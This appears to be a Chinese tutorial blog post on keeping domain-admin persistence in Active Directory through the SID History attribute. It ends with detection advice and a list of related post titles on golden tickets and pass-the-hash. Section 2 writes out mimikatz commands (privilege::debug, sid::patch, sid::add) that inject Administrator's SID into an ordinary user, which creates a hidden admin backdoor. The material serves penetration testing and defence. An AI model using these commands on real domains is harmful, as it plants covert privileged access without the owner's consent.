权限维持之:SID History 域控权限维持
权限维持之:SID History 域控权限维持
- 1 SID 作用
- 2 利用 SID History 操作过程
- 3 SID History 权限维持的防御
1 SID 作用
每个用户都有自己的SID,SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限,SID History是在域迁移过程中需要使用的一个属性。
如果A域中的域用户迁移到B域中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限,如果迁移后用户的SID值改变,系统会将原来的SID添加到迁移后用户的SID History属性中,使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。使用mimikatz可以将SID History属性添加到任意用户的SID History属性中。在渗透测试中,如果获得了域管理员权限(或者等同于域管理员权限),就可以将SID History作为实现持久化的方法。
2 利用 SID History 操作过程
使用域管理员权限的 Poweshell 查看 tester 用户的 SID History 属性
Import-Module ActiveDirectory Get-ADUser tester -Properties sidhistory在域管理员权限的命令行窗口打开 mimikatz,将 Administrator 的 SID 添加到恶意用户 tester 的 SID History 属性中
# 将高权限的 SID History 属性注入 privilege::debug # 注入SID之前需要使用以下命令修复NTDS服务,否则无法将高权限的SID注人低权限用户的SID History属性; sid::patch sid::add /sam:tester /new:administrator# 查看 tester 用户的 SID History 属性 Get-ADUser tester -Properties sidhistory# 清除恶意用户的 SID History 属性 sid::clear /sam:username
3 SID History 权限维持的防御
- 经常查看域用户中SID为500的用户。
- 完成域迁移工作后,对有相同SID History属性的用户进行检查
- 定期检查ID为4765和4766的日志。4765为将 SID Histtory属性添加到用户的日志。4766为将SID History属性添加到用户失败的日志。
权限维持之:SID History 域控权限维持相关推荐
- 黄金票据维持域控权限
黄金票据维持域控权限 实验环境:windows2012域控.windows2012域内主机 实验要求:利用黄金票据维持域控权限 详细步骤: 1.首先搭建相关的域环境 a:设置服务器 b:更改计算机名称 ...
- mimikatz hash传递--获取域控权限
mimikatz hash传递–获取域控权限 实验环境 实验环境:win_server2012 ip:192.168.3.132 (域内普通用户,有本地管理员权限,但不知明文密码) win_serve ...
- sqlserver2000给账户授予所有的权限_内网渗透 | 域内权限解读
域内权限解读 目录 域本地组 全局组 通用组 A-G-DL-P策略 内置组 几个比较重要的域本地组 几个比较重要的全局组.通用组的权限 域本地组 多域用户访问单域资源(访问同一个域) 可以从任何域添加 ...
- 内网渗透测试:域内权限维持思路总结
我的Freebuf:https://www.freebuf.com/author/MrAnonymous 我的博客:https://whoamianony.top/ 文章目录 Windows 操作系统 ...
- 域控 批量导入 用户_kerberos域用户提权分析
2014年,微软发布了一个紧急补丁,修复了Kerberos域用户提权漏洞(MS14-068),所有的Windows服务器操作系统都受到该漏洞的影响.该漏洞允许攻击者将域内任意用户权限,提升到域管理员级 ...
- 利用非约束性委派+Spooler打印机服务 制作黄金票据攻击域控
目录 前言 攻击过程 Rubeus监听 利用打印服务强制让域控机向本机验证身份 提取TGT 注入TGT票据到当前会话并导出域控中所有用户的hash 制作黄金票据 前言 继上一篇 --> 域渗透- ...
- 一次完整的从webshell到域控的探索之路
前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里. 于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求. 今天小菜我本着所有师傅们无私分享的精 ...
- 为什么能通过域成员主机拿下域控服务器的密码呢
问题.为什么能从本机上获得其他主机的账号密码呢? 一个具有一定规模的企业,每天都可能面临员工入职和离职,因此网络管理部门经常需要对域成员主机进行格式化消除磁盘的文件,然后重装系统及软件,以提供给新员工 ...
- 牛红红的日记(平平无奇拿下域控)
牛红红的日记(平平无奇拿下域控) 注:本文首发地址:https://www.sec-in.com 文章作者为-句芒安全实验室-成员之一,欢迎微信搜索关注我们. 一.引文 x年x月x日 晴 我是一只牛, ...
最新文章
- Treelabeling 异或性质,位运算,染色法,二分图(2100)
- java set path_Java Path.setEffect方法代码示例
- yii2框架的安装配置启动
- Thymeleaf Error resolving template [index],template might not exist or might not be accessible
- 几点减几点怎么列算式_节日礼品怎么挑选 这几点很关键
- LOL(英雄联盟)提示不支持虚拟机登录,解决方法
- MySql 实现Row_Number(Partition by)分组函数效果
- python之路_自定义forms组件
- 利用python自动发邮件
- Sass:基础用法学习笔记
- 模拟银行转账(java+mysql+tomcat +JDBC+ druid连接池 + Servlet + Ajax)
- 这个小众副业,一次200,有人月入3万!
- win7+Ubuntu20.04双系统硬盘安装指南(含踩坑记录)
- 以太网交换机和普通交换机主要的8大区别介绍
- 如何看待越来越多年轻人追捧「摸鱼哲学」,拒绝努力的年轻人真比老一辈活得更通透吗?
- proxmox 控制台无法连接_Proxmox VE 5.4中的NAT网络-重置网络接口后,VM的连接消失了...
- Ubuntu20.04下配置Anaconda3+NVIDIA 驱动+Cuda11.1+Cudnn8.0.5
- 关于交换机的现网接入配置简述
- 怎样解决eclipse在线安装插件奇慢无比问题
- Android系列之Activity的传值和回传值